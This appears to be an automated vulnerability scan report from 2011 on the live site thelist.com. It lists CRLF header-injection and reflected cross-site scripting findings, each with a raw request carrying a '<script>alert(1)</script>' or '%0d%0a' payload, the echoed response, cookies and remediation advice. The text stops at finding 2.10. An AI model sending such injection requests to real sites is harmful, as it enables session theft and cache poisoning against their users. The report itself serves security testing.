HTTP Header Injection, www.thelist.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by CloudScan Vulnerability Crawler at Fri Feb 25 15:19:23 CST 2011.


Loading

1. HTTP header injection

1.1. http://www.thelist.com/pppclicks.php [name of an arbitrarily supplied request parameter]

1.2. http://www.thelist.com/pppclicks.php [target parameter]

2. Cross-site scripting (reflected)

2.1. http://www.thelist.com/ [name of an arbitrarily supplied request parameter]

2.2. http://www.thelist.com/HTML/5/2349355.html [name of an arbitrarily supplied request parameter]

2.3. http://www.thelist.com/HTML/7/2331187.html [name of an arbitrarily supplied request parameter]

2.4. http://www.thelist.com/add.php [name of an arbitrarily supplied request parameter]

2.5. http://www.thelist.com/areacode.html [name of an arbitrarily supplied request parameter]

2.6. http://www.thelist.com/countrycode.html [name of an arbitrarily supplied request parameter]

2.7. http://www.thelist.com/index.html [name of an arbitrarily supplied request parameter]

2.8. http://www.thelist.com/misc/canada/ [name of an arbitrarily supplied request parameter]

2.9. http://www.thelist.com/misc/usa/ [name of an arbitrarily supplied request parameter]

2.10. http://www.thelist.com/update.php [name of an arbitrarily supplied request parameter]

3. Cleartext submission of password

3.1. http://www.thelist.com/add.php

3.2. http://www.thelist.com/update.php

4. XML injection

4.1. http://www.thelist.com/add.php [REST URL parameter 1]

4.2. http://www.thelist.com/areacode.html [REST URL parameter 1]

4.3. http://www.thelist.com/countrycode.html [REST URL parameter 1]

4.4. http://www.thelist.com/index.html [REST URL parameter 1]

4.5. http://www.thelist.com/misc/canada/ [REST URL parameter 1]

4.6. http://www.thelist.com/misc/canada/ [REST URL parameter 2]

4.7. http://www.thelist.com/misc/usa/ [REST URL parameter 1]

4.8. http://www.thelist.com/misc/usa/ [REST URL parameter 2]

4.9. http://www.thelist.com/update.php [REST URL parameter 1]

5. Cookie without HttpOnly flag set

5.1. http://www.thelist.com/add.php

5.2. http://www.thelist.com/update.php

6. Password field with autocomplete enabled

6.1. http://www.thelist.com/add.php

6.2. http://www.thelist.com/update.php

7. Cross-domain POST

7.1. http://www.thelist.com/

7.2. http://www.thelist.com/

7.3. http://www.thelist.com/HTML/5/2349355.html

7.4. http://www.thelist.com/HTML/5/2349355.html

7.5. http://www.thelist.com/HTML/7/2331187.html

7.6. http://www.thelist.com/HTML/7/2331187.html

7.7. http://www.thelist.com/add.php

7.8. http://www.thelist.com/add.php

7.9. http://www.thelist.com/areacode.html

7.10. http://www.thelist.com/areacode.html

7.11. http://www.thelist.com/countrycode.html

7.12. http://www.thelist.com/countrycode.html

7.13. http://www.thelist.com/favicon.ico

7.14. http://www.thelist.com/favicon.ico

7.15. http://www.thelist.com/index.html

7.16. http://www.thelist.com/index.html

7.17. http://www.thelist.com/misc/canada/

7.18. http://www.thelist.com/misc/canada/

7.19. http://www.thelist.com/misc/usa/

7.20. http://www.thelist.com/misc/usa/

7.21. http://www.thelist.com/update.php

7.22. http://www.thelist.com/update.php

8. Cross-domain script include

8.1. http://www.thelist.com/

8.2. http://www.thelist.com/HTML/5/2349355.html

8.3. http://www.thelist.com/HTML/7/2331187.html

8.4. http://www.thelist.com/add.php

8.5. http://www.thelist.com/areacode.html

8.6. http://www.thelist.com/countrycode.html

8.7. http://www.thelist.com/icom_includes/quad/QUAD_AD.js

8.8. http://www.thelist.com/index.html

8.9. http://www.thelist.com/misc/canada/

8.10. http://www.thelist.com/misc/usa/

8.11. http://www.thelist.com/update.php

9. Email addresses disclosed

9.1. http://www.thelist.com/add.php

9.2. http://www.thelist.com/update.php

10. HTML does not specify charset

10.1. http://www.thelist.com/

10.2. http://www.thelist.com/HTML/5/2349355.html

10.3. http://www.thelist.com/HTML/7/2331187.html

10.4. http://www.thelist.com/add.php

10.5. http://www.thelist.com/areacode.html

10.6. http://www.thelist.com/countrycode.html

10.7. http://www.thelist.com/favicon.ico

10.8. http://www.thelist.com/index.html

10.9. http://www.thelist.com/misc/canada/

10.10. http://www.thelist.com/misc/usa/

10.11. http://www.thelist.com/update.php



1. HTTP header injection  next
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://www.thelist.com/pppclicks.php [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /pppclicks.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f509c%0d%0a6dde35ca4e3 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pppclicks.php?type=PROFILE&cid=2901&target=/HTML/5/2349355./f509c%0d%0a6dde35ca4e3html HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:49:45 GMT
Server: Apache
Location: /HTML/5/2349355./f509c
6dde35ca4e3
html
Content-Type: text/html
Content-Length: 0


1.2. http://www.thelist.com/pppclicks.php [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /pppclicks.php

Issue detail

The value of the target request parameter is copied into the Location response header. The payload d7130%0d%0acc710b14b5f was submitted in the target parameter. This caused a response containing an injected HTTP header.

Request

GET /pppclicks.php?type=PROFILE&cid=2901&target=d7130%0d%0acc710b14b5f HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:05 GMT
Server: Apache
Location: d7130
cc710b14b5f

Content-Type: text/html
Content-Length: 0


2. Cross-site scripting (reflected)  previous  next
There are 10 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.thelist.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6fd89--><script>alert(1)</script>3e9f72d52de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?6fd89--><script>alert(1)</script>3e9f72d52de=1 HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:47:03 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:48:03 GMT
Content-Type: text/html
Content-Length: 46036

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /?6fd89--><script>alert(1)</script>3e9f72d52de=1 -->
...[SNIP]...

2.2. http://www.thelist.com/HTML/5/2349355.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /HTML/5/2349355.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 236a8--><script>alert(1)</script>8d68ddba170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /HTML/5/2349355.html?236a8--><script>alert(1)</script>8d68ddba170=1 HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:39 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:49:39 GMT
Content-Type: text/html
Content-Length: 45210

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /HTML/5/2349355.html?236a8--><script>alert(1)</script>8d68ddba170=1 -->
...[SNIP]...

2.3. http://www.thelist.com/HTML/7/2331187.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /HTML/7/2331187.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3a773--><script>alert(1)</script>cf39e5ac2b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /HTML/7/2331187.html?3a773--><script>alert(1)</script>cf39e5ac2b3=1 HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:48:52 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 12:49:52 GMT
Content-Type: text/html
Content-Length: 44681

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script src="/icom_includes/quad/thelist/config.js"></script>
<script src="/icom_includes/quad/QUAD_AD.js"></scr
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /HTML/7/2331187.html?3a773--><script>alert(1)</script>cf39e5ac2b3=1 -->
...[SNIP]...

2.4. http://www.thelist.com/add.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /add.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d2f7f--><script>alert(1)</script>c4dfa717f01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /add.php?d2f7f--><script>alert(1)</script>c4dfa717f01=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:30 GMT
Server: Apache
Set-Cookie: PHPSESSID=b6743747b67654794e4b7778bff3bbae; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 47159


<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /add.php?d2f7f--><script>alert(1)</script>c4dfa717f01=1 -->
...[SNIP]...

2.5. http://www.thelist.com/areacode.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /areacode.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 74a93--><script>alert(1)</script>e34ffffc7c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /areacode.html?74a93--><script>alert(1)</script>e34ffffc7c6=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:33 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:33 GMT
Connection: close
Content-Type: text/html
Content-Length: 58520

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script langua
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /areacode.html?74a93--><script>alert(1)</script>e34ffffc7c6=1 -->
...[SNIP]...

2.6. http://www.thelist.com/countrycode.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /countrycode.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 30741--><script>alert(1)</script>8e229fc5059 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /countrycode.html?30741--><script>alert(1)</script>8e229fc5059=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:35 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:35 GMT
Connection: close
Content-Type: text/html
Content-Length: 70479

<HTML>
<HEAD>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script language="javascript" src="http://e1.cdn.qnsr.com/jsc/e1/fx.js"></script>
<scrip
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /countrycode.html?30741--><script>alert(1)</script>8e229fc5059=1 -->
...[SNIP]...

2.7. http://www.thelist.com/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload eff60--><script>alert(1)</script>398ed0a3768 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index.html?eff60--><script>alert(1)</script>398ed0a3768=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:31 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:31 GMT
Connection: close
Content-Type: text/html
Content-Length: 46084

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /index.html?eff60--><script>alert(1)</script>398ed0a3768=1 -->
...[SNIP]...

2.8. http://www.thelist.com/misc/canada/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /misc/canada/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d970c--><script>alert(1)</script>4f484edfe23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /misc/canada/?d970c--><script>alert(1)</script>4f484edfe23=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:33 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:33 GMT
Connection: close
Content-Type: text/html
Content-Length: 56546

<HTML>
<HEAD>
<TITLE>
Canadian Nationwide ISPs
</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script language="javascript" src="http:/
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /misc/canada/?d970c--><script>alert(1)</script>4f484edfe23=1 -->
...[SNIP]...

2.9. http://www.thelist.com/misc/usa/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /misc/usa/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 54029--><script>alert(1)</script>63b507b24db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /misc/usa/?54029--><script>alert(1)</script>63b507b24db=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 14:52:52 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 14:53:52 GMT
Connection: close
Content-Type: text/html
Content-Length: 73083

<HTML>
<HEAD>
<TITLE>
U.S. Nationwide ISPs
</TITLE>

<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script>
<script language="javascript" src="http://e1.
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /misc/usa/?54029--><script>alert(1)</script>63b507b24db=1 -->
...[SNIP]...

2.10. http://www.thelist.com/update.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /update.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 2c2ad--><script>alert(1)</script>4971a9e3236 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /update.php?2c2ad--><script>alert(1)</script>4971a9e3236=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
